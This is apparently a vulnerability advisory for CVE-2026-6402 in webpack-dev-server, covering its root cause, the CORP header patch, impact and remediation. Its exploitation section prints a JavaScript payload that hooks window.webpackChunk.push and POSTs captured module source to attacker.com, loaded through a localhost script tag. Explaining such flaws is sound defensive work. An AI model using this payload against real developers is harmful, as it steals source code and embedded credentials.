CVE-2026-6402: Cross-Origin Source Code Exposure in webpack-dev-server

webpack-dev-server is a development utility that provides live reloading and serves compiled frontend assets during application development. The utility compiles source code into JavaScript bundles and exposes them via a local HTTP server. These bundles contain the entirety of the application's client-side source code, frequently including unminified logic, development credentials, and internal API endpoints.

CVE-2026-6402 is a cross-origin source code exposure vulnerability affecting versions 5.2.3 and earlier. The vulnerability is tracked under CWE-749 (Exposed Dangerous Method or Function). The issue arises when the server is accessed over plain HTTP, allowing malicious external websites to bypass security controls and load the bundles via cross-origin script inclusion.

The vulnerability stems from an architectural weakness in how webpack-dev-server validates incoming cross-origin requests. A prior security patch for CVE-2025-30359 introduced validation based on Fetch Metadata request headers (Sec-Fetch-Mode and Sec-Fetch-Site). Because modern browsers omit these headers for non-trustworthy origins such as standard HTTP, the server's middleware defaults to an allow state.

The technical root cause involves a combination of browser security policies and the execution model of webpack bundles. Browsers enforce the Same-Origin Policy (SOP) to restrict cross-origin data access. However, HTML <script> tags inherently bypass the SOP to allow the execution of cross-origin resources. While the host page cannot read the raw text of the fetched script natively, it can intercept the execution environment if the script interacts with global variables.

Webpack bundles are designed to register their contained modules into a global registry for hot module replacement and chunk loading. The registry typically takes the form of a global array or object, such as window.webpackChunk or self.webpackHotUpdate. When a bundle executes, it immediately pushes its internal module definitions to these global structures.

If a malicious website includes the target developer's local bundle via a <script> tag, the browser executes the bundle within the context of the attacker's page. The attacker can pre-define the global registry structures and intercept the modules as they are registered. The failure of the server to block the initial cross-origin request allows the malicious page to capture the application's source code during execution.

The vulnerable implementation relied entirely on request-side validation using Fetch Metadata headers. The server checked for the presence of Sec-Fetch-Site: cross-site to block unauthorized inclusions. When browsers omitted these headers over plain HTTP connections, the validation logic failed open, permitting the HTTP request to succeed.

The patch for CVE-2026-6402 shifts the defense mechanism from request validation to response headers. The maintainers implemented the Cross-Origin-Resource-Policy: same-origin (CORP) header. CORP is a robust, response-side security control that instructs the browser to block the resource from loading in cross-origin contexts, regardless of the request type or HTML tag used.

// Patch implemented in lib/Server.js
if (
  this.options.allowedHosts !== "all" &&
  !this.isUserCORSWildcardEnabled()
) {
  res.setHeader("Cross-Origin-Resource-Policy", "same-origin");
}

The patched code automatically applies the CORP header unless open access is explicitly configured. When a modern browser receives this response header, it enforces the restriction at the network layer and prevents the script from executing in the malicious page context. This comprehensively closes the cross-origin inclusion vector.

Exploitation requires an attacker to successfully target a developer actively running the vulnerable webpack-dev-server locally. The attacker must host a malicious webpage and entice the developer to visit it. The attack relies on the predictable local network configuration typically used by development environments, such as localhost or 127.0.0.1 on port 8080 or 3000.

The attacker's webpage defines a proxy object or overrides the expected global webpack registry function before including the target bundle. The JavaScript payload hooks the push method of window.webpackChunk. When the bundle loads, it invokes this modified function, passing the module identifiers and raw source code directly into the attacker's control.

// Example exploit payload hosted on attacker site
window.webpackChunk = {
  push: function(chunk) {
    const [id, modules] = chunk;
    for (const moduleId in modules) {
      // Intercept and exfiltrate the raw source code
      fetch('https://attacker.com/steal', {
        method: 'POST',
        body: modules[moduleId].toString()
      });
    }
  }
};

Following the definition of the hook, the malicious page injects a <script src="http://localhost:8080/main.js"></script> tag. The browser requests the file, the server responds with the bundle, and the source code is subsequently sent to the attacker-controlled server.

The primary impact of CVE-2026-6402 is the complete loss of source code confidentiality. Front-end codebases frequently contain sensitive intellectual property, proprietary algorithms, and hardcoded internal endpoints. During development, engineers may also temporarily hardcode administrative credentials or access tokens, which become exposed within the bundle.

The vulnerability carries a CVSS 3.1 Base Score of 5.3. Exploitation requires user interaction, specifically the developer visiting a malicious site while the server is running. The attack complexity evaluates to High because the attacker must accurately target the local port the development server is bound to.

The impact is constrained by newer browser-level protections. Chromium-based browsers (Chrome 142+) implement Local Network Access (LNA) restrictions by default. LNA prevents public internet sites from initiating requests to private network addresses without preflight consent. Developers using Firefox, Safari, or older Chromium versions remain exposed to this attack vector.

The primary remediation is upgrading webpack-dev-server to version 5.2.4 or later. This release correctly implements the Cross-Origin-Resource-Policy header, mitigating the vulnerability universally across all compliant browsers. Development teams must enforce minimum version requirements in their dependency manifests to ensure the patch applies consistently.

For environments where immediate patching is not feasible, developers must apply configuration-based workarounds. Running the development server over TLS utilizing the --https flag ensures the connection operates in a secure context. In secure contexts, browsers append the necessary Fetch Metadata headers, allowing the legacy CVE-2025-30359 mitigations to function as intended.

Administrators must also avoid configuring allowedHosts: 'all' within the webpack configuration. Restricting the allowedHosts directive to specific, trusted domains reduces the attack surface by enforcing strict host header validation on incoming requests.